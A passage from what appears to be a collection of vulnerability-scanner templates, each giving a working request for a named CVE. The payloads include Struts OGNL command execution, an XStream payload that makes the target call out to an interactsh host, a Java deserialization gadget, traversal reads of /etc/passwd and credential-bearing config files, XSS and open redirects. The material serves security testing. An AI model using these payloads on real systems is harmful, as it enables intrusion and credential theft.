ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File 